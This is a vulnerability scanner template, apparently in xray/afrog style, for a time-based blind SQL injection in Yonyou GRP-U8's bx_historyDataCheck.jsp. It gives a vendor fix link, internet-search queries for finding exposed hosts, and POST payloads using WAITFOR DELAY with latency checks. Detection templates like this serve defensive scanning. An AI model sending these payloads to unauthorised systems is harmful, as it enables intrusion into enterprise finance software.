漏洞描述
用友GRP-U8 /u8qx/bx_historyDataCheck.jsp SQL注入漏洞
修复方法:https://security.yonyou.com/#/noticeInfo?id=379
Fofa: app="用友-GRP-U8"
Hunter: app.name="用友GRP-U8 OA"
ZoomEye: app:"用友GRP-U8"
id: yonyou-grp-u8-bx_historyDataChecks-sqli
info:
name: 用友GRP-U8 bx_historyDataCheck.jsp SQL注入漏洞
author: Y3y1ng
severity: high
verified: true
description: |-
用友GRP-U8 /u8qx/bx_historyDataCheck.jsp SQL注入漏洞
修复方法:https://security.yonyou.com/#/noticeInfo?id=379
Fofa: app="用友-GRP-U8"
Hunter: app.name="用友GRP-U8 OA"
ZoomEye: app:"用友GRP-U8"
reference:
- https://mp.weixin.qq.com/s/BTDkd1y5J2-4BC9ilrdftA
tags: yonyou,sqli
created: 2023/09/22
rules:
r0:
request:
method: POST
path: /u8qx/bx_historyDataCheck.jsp
body: userName=';WAITFOR DELAY '0:0:10'--&ysnd=&historyFlag=
expression: response.status == 200 && response.latency <= 11000 && response.latency >= 10000
r1:
request:
method: POST
path: /u8qx/bx_historyDataCheck.jsp
body: userName=';WAITFOR DELAY '0:0:6'--&ysnd=&historyFlag=
expression: response.status == 200 && response.latency <= 7000 && response.latency >= 6000
r2:
request:
method: POST
path: /u8qx/bx_historyDataCheck.jsp
body: userName=';WAITFOR DELAY '0:0:10'--&ysnd=&historyFlag=
expression: response.status == 200 && response.latency <= 11000 && response.latency >= 10000
r3:
request:
method: POST
path: /u8qx/bx_historyDataCheck.jsp
body: userName=';WAITFOR DELAY '0:0:6'--&ysnd=&historyFlag=
expression: response.status == 200 && response.latency <= 7000 && response.latency >= 6000
expression: r0() && r1() && r2() && r3()